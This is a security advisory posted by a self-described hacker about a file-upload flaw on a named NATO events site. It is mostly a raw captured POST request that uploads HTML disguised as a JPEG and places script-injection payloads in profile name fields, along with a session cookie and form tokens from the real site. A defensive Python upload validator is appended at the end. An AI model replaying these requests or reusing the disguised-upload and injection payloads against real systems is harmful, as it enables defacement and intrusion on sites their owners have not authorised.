NATO Training Center Upload Vulnerability

2018.05.09
God3err (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Videos : https://www.youtube.com/watch?v=sxfdmc-FE5M
----------------------------------------------------------------
Vulnerable POST Code :
----------------------------------------------------------------
17:28:39.016 [4438ms] [total 4438ms] Status: 200[OK]
POST https://events.jftc.nato.int/user/26426/userdata?element_parents=userdata/user_picture&ajax_form=1&_wrapper_format=drupal_ajax&_wrapper_format=drupal_ajax
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE ] Content Size[-1] Mime Type[application/json]

Request Headers:
   Host[events.jftc.nato.int]
   User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
   Accept[application/json, text/javascript, */*; q=0.01]
   Accept-Language[en-US,en;q=0.5]
   Accept-Encoding[gzip, deflate, br]
   X-Requested-With[XMLHttpRequest]
   Referer[https://events.jftc.nato.int/user/26426/userdata]
   Content-Length[7132]
   Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
   Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
   Connection[keep-alive]

Post Data:
   POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"


-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"

">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"

F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"

OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"

TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"

ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"

Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"

1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"

NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"

1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"


-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"

05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"

safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg

<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"


-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"

6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"

168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"

Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"

married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"

1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"

burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"

Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"

form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"

AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"

simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"

user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"

Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"

1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"

bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"


-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"

autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]

Response Headers:
   Server[nginx]
   Date[Tue, 08 May 2018 14:28:43 GMT]
   Content-Type[application/json]
   Cache-Control[must-revalidate, no-cache, private]
   x-ua-compatible[IE=edge]
   Content-Language[en]
   X-Content-Type-Options[nosniff]
   X-Frame-Options[SAMEORIGIN]
   Expires[Sun, 19 Nov 1978 05:00:00 GMT]
   Vary[Accept-Encoding]
   x-generator[Drupal 8 (https://www.drupal.org)]
   x-drupal-ajax-token[1]
   Content-Encoding[gzip]
   x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
   x-ah-environment[prod]
   x-varnish[713984183]
   Age[0]
   via[1.1 varnish-v4]
   X-Cache[MISS]
   Accept-Ranges[bytes]
   X-Firefox-Spdy[h2]
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------
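In the capture above, the files[user_picture] part is declared as image/jpeg with filename index.jpg while its body is HTML markup. The following server-side check is an added example, not code from the advisory or from the affected site; the function names, the accepted image types and the sample byte strings other than the captured body are assumptions made for illustration.

```python
import re

# Leading-byte signatures for the image types a profile-picture field would accept.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
EXT = {"jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif"}
MARKUP = re.compile(rb"<\s*(html|script|svg|iframe|body)\b", re.I)

# Body of the files[user_picture] part exactly as it appears in the capture.
CAPTURED_BODY = b"<html><h1>Hacked By God3err<h1></html>"
# Constructed samples: a minimal JFIF header, and a JPEG comment segment carrying markup.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 16
SAMPLE_POLYGLOT = b"\xff\xd8\xff\xfe\x00\x14<script>x</script>"


def sniff(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for mime, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return mime
    return None


def check_upload(filename: str, declared: str, data: bytes):
    """Return (accepted, detail). The client's filename and Content-Type are only claims."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    actual = sniff(data)
    if actual is None:
        return False, "content is not a recognised image"
    if EXT.get(ext) != actual:
        return False, "extension does not match content"
    if declared != actual:
        return False, "declared Content-Type does not match content"
    if MARKUP.search(data[:1024]):
        return False, "markup found in image header region"
    return True, actual


if __name__ == "__main__":
    for name, body in [("index.jpg", CAPTURED_BODY), ("photo.jpg", SAMPLE_JPEG),
                       ("photo.jpg", SAMPLE_POLYGLOT)]:
        print(name, check_upload(name, "image/jpeg", body))
```

A signature check only confirms the file header; re-encoding accepted images on the server and serving stored uploads with a fixed image Content-Type and nosniff covers files that pass the header check but carry other content.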

References:

https://www.youtube.com/watch?v=sxfdmc-FE5M



Copyright 2024, cxsecurity.com

 
